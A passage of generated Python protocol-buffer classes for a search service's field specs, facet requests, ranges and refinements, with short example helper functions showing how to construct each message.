_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "scorer",
2: "limit",
9: "match_scorer_parameters",
}, 9)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.NUMERIC,
9: ProtocolBuffer.Encoder.STRING,
}, 9, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ScorerSpec'
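# Editor's note: illustrative sketch, not generated code. ScorerSpec picks the
# scoring algorithm (RESCORING_MATCH_SCORER or MATCH_SCORER, default
# MATCH_SCORER) and caps how many documents get scored via limit (default
# 1000). Only accessors defined above are used; the helper name and values
# are hypothetical.
def _example_scorer_spec():
  """Builds a ScorerSpec that rescoring-scores at most 500 documents."""
  spec = ScorerSpec()
  spec.set_scorer(ScorerSpec.RESCORING_MATCH_SCORER)
  spec.set_limit(500)
  assert spec.IsInitialized()  # ScorerSpec has no required fields.
  return spec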
class FieldSpec_Expression(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_expression_ = 0
expression_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def expression(self): return self.expression_
def set_expression(self, x):
self.has_expression_ = 1
self.expression_ = x
def clear_expression(self):
if self.has_expression_:
self.has_expression_ = 0
self.expression_ = ""
def has_expression(self): return self.has_expression_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_expression()): self.set_expression(x.expression())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_expression_ != x.has_expression_: return 0
if self.has_expression_ and self.expression_ != x.expression_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (not self.has_expression_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: expression not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
n += self.lengthString(len(self.expression_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_expression_):
n += 1
n += self.lengthString(len(self.expression_))
return n
def Clear(self):
self.clear_name()
self.clear_expression()
def OutputUnchecked(self, out):
out.putVarInt32(26)
out.putPrefixedString(self.name_)
out.putVarInt32(34)
out.putPrefixedString(self.expression_)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(26)
out.putPrefixedString(self.name_)
if (self.has_expression_):
out.putVarInt32(34)
out.putPrefixedString(self.expression_)
def TryMerge(self, d):
while 1:
tt = d.getVarInt32()
if tt == 20: break
if tt == 26:
self.set_name(d.getPrefixedString())
continue
if tt == 34:
self.set_expression(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_expression_: res+=prefix+("expression: %s\n" % self.DebugFormatString(self.expression_))
return res
class FieldSpec(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.name_ = []
self.expression_ = []
if contents is not None: self.MergeFromString(contents)
def name_size(self): return len(self.name_)
def name_list(self): return self.name_
def name(self, i):
return self.name_[i]
def set_name(self, i, x):
self.name_[i] = x
def add_name(self, x):
self.name_.append(x)
def clear_name(self):
self.name_ = []
def expression_size(self): return len(self.expression_)
def expression_list(self): return self.expression_
def expression(self, i):
return self.expression_[i]
def mutable_expression(self, i):
return self.expression_[i]
def add_expression(self):
x = FieldSpec_Expression()
self.expression_.append(x)
return x
def clear_expression(self):
self.expression_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.name_size()): self.add_name(x.name(i))
for i in xrange(x.expression_size()): self.add_expression().CopyFrom(x.expression(i))
def Equals(self, x):
if x is self: return 1
if len(self.name_) != len(x.name_): return 0
for e1, e2 in zip(self.name_, x.name_):
if e1 != e2: return 0
if len(self.expression_) != len(x.expression_): return 0
for e1, e2 in zip(self.expression_, x.expression_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.expression_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.name_)
for i in xrange(len(self.name_)): n += self.lengthString(len(self.name_[i]))
n += 2 * len(self.expression_)
for i in xrange(len(self.expression_)): n += self.expression_[i].ByteSize()
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.name_)
for i in xrange(len(self.name_)): n += self.lengthString(len(self.name_[i]))
n += 2 * len(self.expression_)
for i in xrange(len(self.expression_)): n += self.expression_[i].ByteSizePartial()
return n
def Clear(self):
self.clear_name()
self.clear_expression()
def OutputUnchecked(self, out):
for i in xrange(len(self.name_)):
out.putVarInt32(10)
out.putPrefixedString(self.name_[i])
for i in xrange(len(self.expression_)):
out.putVarInt32(19)
self.expression_[i].OutputUnchecked(out)
out.putVarInt32(20)
def OutputPartial(self, out):
for i in xrange(len(self.name_)):
out.putVarInt32(10)
out.putPrefixedString(self.name_[i])
for i in xrange(len(self.expression_)):
out.putVarInt32(19)
self.expression_[i].OutputPartial(out)
out.putVarInt32(20)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_name(d.getPrefixedString())
continue
if tt == 19:
self.add_expression().TryMerge(d)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.name_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("name%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
cnt=0
for e in self.expression_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("Expression%s {\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+"}\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kExpressionGroup = 2
kExpressionname = 3
kExpressionexpression = 4
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "Expression",
3: "name",
4: "expression",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STARTGROUP,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FieldSpec'
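# Editor's note: illustrative sketch, not generated code. FieldSpec limits
# which document fields come back and can attach computed expressions; each
# Expression group requires both name and expression. Only accessors defined
# above are used; the field name and expression string are hypothetical.
def _example_field_spec():
  """Requests the 'title' field plus one computed expression."""
  spec = FieldSpec()
  spec.add_name('title')
  expr = spec.add_expression()
  expr.set_name('discounted')
  expr.set_expression('price * 0.9')
  assert spec.IsInitialized()  # both required Expression members are set
  return spec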
class FacetRange(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_start_ = 0
start_ = ""
has_end_ = 0
end_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def start(self): return self.start_
def set_start(self, x):
self.has_start_ = 1
self.start_ = x
def clear_start(self):
if self.has_start_:
self.has_start_ = 0
self.start_ = ""
def has_start(self): return self.has_start_
def end(self): return self.end_
def set_end(self, x):
self.has_end_ = 1
self.end_ = x
def clear_end(self):
if self.has_end_:
self.has_end_ = 0
self.end_ = ""
def has_end(self): return self.has_end_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_start()): self.set_start(x.start())
if (x.has_end()): self.set_end(x.end())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_start_ != x.has_start_: return 0
if self.has_start_ and self.start_ != x.start_: return 0
if self.has_end_ != x.has_end_: return 0
if self.has_end_ and self.end_ != x.end_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_name_): n += 1 + self.lengthString(len(self.name_))
if (self.has_start_): n += 1 + self.lengthString(len(self.start_))
if (self.has_end_): n += 1 + self.lengthString(len(self.end_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_name_): n += 1 + self.lengthString(len(self.name_))
if (self.has_start_): n += 1 + self.lengthString(len(self.start_))
if (self.has_end_): n += 1 + self.lengthString(len(self.end_))
return n
def Clear(self):
self.clear_name()
self.clear_start()
self.clear_end()
def OutputUnchecked(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_start_):
out.putVarInt32(18)
out.putPrefixedString(self.start_)
if (self.has_end_):
out.putVarInt32(26)
out.putPrefixedString(self.end_)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_start_):
out.putVarInt32(18)
out.putPrefixedString(self.start_)
if (self.has_end_):
out.putVarInt32(26)
out.putPrefixedString(self.end_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
self.set_start(d.getPrefixedString())
continue
if tt == 26:
self.set_end(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_start_: res+=prefix+("start: %s\n" % self.DebugFormatString(self.start_))
if self.has_end_: res+=prefix+("end: %s\n" % self.DebugFormatString(self.end_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kstart = 2
kend = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "start",
3: "end",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRange'
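# Editor's note: illustrative sketch, not generated code. FacetRange names a
# value bucket with optional start and end bounds, carried as strings on the
# wire. Only accessors defined above are used; the literal values are
# hypothetical.
def _example_facet_range():
  """Builds a FacetRange labelled '0-100' bounded by '0' and '100'."""
  facet_range = FacetRange()
  facet_range.set_name('0-100')
  facet_range.set_start('0')
  facet_range.set_end('100')
  return facet_range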
class FacetRequestParam(ProtocolBuffer.ProtocolMessage):
has_value_limit_ = 0
value_limit_ = 0
def __init__(self, contents=None):
self.range_ = []
self.value_constraint_ = []
if contents is not None: self.MergeFromString(contents)
def value_limit(self): return self.value_limit_
def set_value_limit(self, x):
self.has_value_limit_ = 1
self.value_limit_ = x
def clear_value_limit(self):
if self.has_value_limit_:
self.has_value_limit_ = 0
self.value_limit_ = 0
def has_value_limit(self): return self.has_value_limit_
def range_size(self): return len(self.range_)
def range_list(self): return self.range_
def range(self, i):
return self.range_[i]
def mutable_range(self, i):
return self.range_[i]
def add_range(self):
x = FacetRange()
self.range_.append(x)
return x
def clear_range(self):
self.range_ = []
def value_constraint_size(self): return len(self.value_constraint_)
def value_constraint_list(self): return self.value_constraint_
def value_constraint(self, i):
return self.value_constraint_[i]
def set_value_constraint(self, i, x):
self.value_constraint_[i] = x
def add_value_constraint(self, x):
self.value_constraint_.append(x)
def clear_value_constraint(self):
self.value_constraint_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_value_limit()): self.set_value_limit(x.value_limit())
for i in xrange(x.range_size()): self.add_range().CopyFrom(x.range(i))
for i in xrange(x.value_constraint_size()): self.add_value_constraint(x.value_constraint(i))
def Equals(self, x):
if x is self: return 1
if self.has_value_limit_ != x.has_value_limit_: return 0
if self.has_value_limit_ and self.value_limit_ != x.value_limit_: return 0
if len(self.range_) != len(x.range_): return 0
for e1, e2 in zip(self.range_, x.range_):
if e1 != e2: return 0
if len(self.value_constraint_) != len(x.value_constraint_): return 0
for e1, e2 in zip(self.value_constraint_, x.value_constraint_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.range_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
if (self.has_value_limit_): n += 1 + self.lengthVarInt64(self.value_limit_)
n += 1 * len(self.range_)
for i in xrange(len(self.range_)): n += self.lengthString(self.range_[i].ByteSize())
n += 1 * len(self.value_constraint_)
for i in xrange(len(self.value_constraint_)): n += self.lengthString(len(self.value_constraint_[i]))
return n
def ByteSizePartial(self):
n = 0
if (self.has_value_limit_): n += 1 + self.lengthVarInt64(self.value_limit_)
n += 1 * len(self.range_)
for i in xrange(len(self.range_)): n += self.lengthString(self.range_[i].ByteSizePartial())
n += 1 * len(self.value_constraint_)
for i in xrange(len(self.value_constraint_)): n += self.lengthString(len(self.value_constraint_[i]))
return n
def Clear(self):
self.clear_value_limit()
self.clear_range()
self.clear_value_constraint()
def OutputUnchecked(self, out):
if (self.has_value_limit_):
out.putVarInt32(8)
out.putVarInt32(self.value_limit_)
for i in xrange(len(self.range_)):
out.putVarInt32(18)
out.putVarInt32(self.range_[i].ByteSize())
self.range_[i].OutputUnchecked(out)
for i in xrange(len(self.value_constraint_)):
out.putVarInt32(26)
out.putPrefixedString(self.value_constraint_[i])
def OutputPartial(self, out):
if (self.has_value_limit_):
out.putVarInt32(8)
out.putVarInt32(self.value_limit_)
for i in xrange(len(self.range_)):
out.putVarInt32(18)
out.putVarInt32(self.range_[i].ByteSizePartial())
self.range_[i].OutputPartial(out)
for i in xrange(len(self.value_constraint_)):
out.putVarInt32(26)
out.putPrefixedString(self.value_constraint_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_value_limit(d.getVarInt32())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_range().TryMerge(tmp)
continue
if tt == 26:
self.add_value_constraint(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_value_limit_: res+=prefix+("value_limit: %s\n" % self.DebugFormatInt32(self.value_limit_))
cnt=0
for e in self.range_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("range%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
cnt=0
for e in self.value_constraint_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("value_constraint%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kvalue_limit = 1
krange = 2
kvalue_constraint = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "value_limit",
2: "range",
3: "value_constraint",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRequestParam'
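# Editor's note: illustrative sketch, not generated code. FacetRequestParam
# tunes one facet request with an optional value_limit plus repeated ranges
# and value constraints. Only accessors defined above are used; the literal
# values are hypothetical.
def _example_facet_request_param():
  """Keeps the top 5 facet values and adds two open-ended ranges."""
  param = FacetRequestParam()
  param.set_value_limit(5)
  param.add_range().set_end('100')
  param.add_range().set_start('100')
  param.add_value_constraint('other')
  return param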
class FacetAutoDetectParam(ProtocolBuffer.ProtocolMessage):
has_value_limit_ = 0
value_limit_ = 10
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def value_limit(self): return self.value_limit_
def set_value_limit(self, x):
self.has_value_limit_ = 1
self.value_limit_ = x
def clear_value_limit(self):
if self.has_value_limit_:
self.has_value_limit_ = 0
self.value_limit_ = 10
def has_value_limit(self): return self.has_value_limit_
def MergeFrom(self, x):
assert x is not self
if (x.has_value_limit()): self.set_value_limit(x.value_limit())
def Equals(self, x):
if x is self: return 1
if self.has_value_limit_ != x.has_value_limit_: return 0
if self.has_value_limit_ and self.value_limit_ != x.value_limit_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_value_limit_): n += 1 + self.lengthVarInt64(self.value_limit_)
return n
def ByteSizePartial(self):
n = 0
if (self.has_value_limit_): n += 1 + self.lengthVarInt64(self.value_limit_)
return n
def Clear(self):
self.clear_value_limit()
def OutputUnchecked(self, out):
if (self.has_value_limit_):
out.putVarInt32(8)
out.putVarInt32(self.value_limit_)
def OutputPartial(self, out):
if (self.has_value_limit_):
out.putVarInt32(8)
out.putVarInt32(self.value_limit_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_value_limit(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_value_limit_: res+=prefix+("value_limit: %s\n" % self.DebugFormatInt32(self.value_limit_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kvalue_limit = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "value_limit",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetAutoDetectParam'
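# Editor's note: illustrative sketch, not generated code. FacetAutoDetectParam
# carries a single optional value_limit (default 10) applied to automatically
# discovered facets; the value below is hypothetical.
def _example_facet_auto_detect_param():
  """Raises the per-facet value limit for auto-discovered facets to 20."""
  param = FacetAutoDetectParam()
  param.set_value_limit(20)
  return param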
class FacetRequest(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_params_ = 0
params_ = None
def __init__(self, contents=None):
self.lazy_init_lock_ = thread.allocate_lock()
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def params(self):
if self.params_ is None:
self.lazy_init_lock_.acquire()
try:
if self.params_ is None: self.params_ = FacetRequestParam()
finally:
self.lazy_init_lock_.release()
return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params()
def clear_params(self):
if self.has_params_:
self.has_params_ = 0;
if self.params_ is not None: self.params_.Clear()
def has_params(self): return self.has_params_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (self.has_params_ and not self.params_.IsInitialized(debug_strs)): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
if (self.has_params_): n += 1 + self.lengthString(self.params_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_params_): n += 1 + self.lengthString(self.params_.ByteSizePartial())
return n
def Clear(self):
self.clear_name()
self.clear_params()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_params_):
out.putVarInt32(18)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_params_):
out.putVarInt32(18)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kparams = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "params",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRequest'
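# Editor's note: illustrative sketch, not generated code. FacetRequest names a
# facet to aggregate (name is required) and lazily builds its optional
# FacetRequestParam through mutable_params(). Only accessors defined above are
# used; the facet name is hypothetical.
def _example_facet_request():
  """Requests the 'category' facet, keeping only its top 3 values."""
  request = FacetRequest()
  request.set_name('category')
  request.mutable_params().set_value_limit(3)
  assert request.IsInitialized()  # name, the only required field, is set
  return request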
class FacetRefinement_Range(ProtocolBuffer.ProtocolMessage):
has_start_ = 0
start_ = ""
has_end_ = 0
end_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def start(self): return self.start_
def set_start(self, x):
self.has_start_ = 1
self.start_ = x
def clear_start(self):
if self.has_start_:
self.has_start_ = 0
self.start_ = ""
def has_start(self): return self.has_start_
def end(self): return self.end_
def set_end(self, x):
self.has_end_ = 1
self.end_ = x
def clear_end(self):
if self.has_end_:
self.has_end_ = 0
self.end_ = ""
def has_end(self): return self.has_end_
def MergeFrom(self, x):
assert x is not self
if (x.has_start()): self.set_start(x.start())
if (x.has_end()): self.set_end(x.end())
def Equals(self, x):
if x is self: return 1
if self.has_start_ != x.has_start_: return 0
if self.has_start_ and self.start_ != x.start_: return 0
if self.has_end_ != x.has_end_: return 0
if self.has_end_ and self.end_ != x.end_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_start_): n += 1 + self.lengthString(len(self.start_))
if (self.has_end_): n += 1 + self.lengthString(len(self.end_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_start_): n += 1 + self.lengthString(len(self.start_))
if (self.has_end_): n += 1 + self.lengthString(len(self.end_))
return n
def Clear(self):
self.clear_start()
self.clear_end()
def OutputUnchecked(self, out):
if (self.has_start_):
out.putVarInt32(10)
out.putPrefixedString(self.start_)
if (self.has_end_):
out.putVarInt32(18)
out.putPrefixedString(self.end_)
def OutputPartial(self, out):
if (self.has_start_):
out.putVarInt32(10)
out.putPrefixedString(self.start_)
if (self.has_end_):
out.putVarInt32(18)
out.putPrefixedString(self.end_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_start(d.getPrefixedString())
continue
if tt == 18:
self.set_end(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_start_: res+=prefix+("start: %s\n" % self.DebugFormatString(self.start_))
if self.has_end_: res+=prefix+("end: %s\n" % self.DebugFormatString(self.end_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstart = 1
kend = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "start",
2: "end",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRefinement_Range'
class FacetRefinement(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_value_ = 0
value_ = ""
has_range_ = 0
range_ = None
def __init__(self, contents=None):
self.lazy_init_lock_ = thread.allocate_lock()
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def value(self): return self.value_
def set_value(self, x):
self.has_value_ = 1
self.value_ = x
def clear_value(self):
if self.has_value_:
self.has_value_ = 0
self.value_ = ""
def has_value(self): return self.has_value_
def range(self):
if self.range_ is None:
self.lazy_init_lock_.acquire()
try:
if self.range_ is None: self.range_ = FacetRefinement_Range()
finally:
self.lazy_init_lock_.release()
return self.range_
def mutable_range(self): self.has_range_ = 1; return self.range()
def clear_range(self):
if self.has_range_:
self.has_range_ = 0;
if self.range_ is not None: self.range_.Clear()
def has_range(self): return self.has_range_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_value()): self.set_value(x.value())
if (x.has_range()): self.mutable_range().MergeFrom(x.range())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_value_ != x.has_value_: return 0
if self.has_value_ and self.value_ != x.value_: return 0
if self.has_range_ != x.has_range_: return 0
if self.has_range_ and self.range_ != x.range_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (self.has_range_ and not self.range_.IsInitialized(debug_strs)): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
if (self.has_value_): n += 1 + self.lengthString(len(self.value_))
if (self.has_range_): n += 1 + self.lengthString(self.range_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_value_): n += 1 + self.lengthString(len(self.value_))
if (self.has_range_): n += 1 + self.lengthString(self.range_.ByteSizePartial())
return n
def Clear(self):
self.clear_name()
self.clear_value()
self.clear_range()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
if (self.has_range_):
out.putVarInt32(26)
out.putVarInt32(self.range_.ByteSize())
self.range_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
if (self.has_range_):
out.putVarInt32(26)
out.putVarInt32(self.range_.ByteSizePartial())
self.range_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
self.set_value(d.getPrefixedString())
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_range().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_value_: res+=prefix+("value: %s\n" % self.DebugFormatString(self.value_))
if self.has_range_:
res+=prefix+"range <\n"
res+=self.range_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kvalue = 2
krange = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "value",
3: "range",
}, 3)
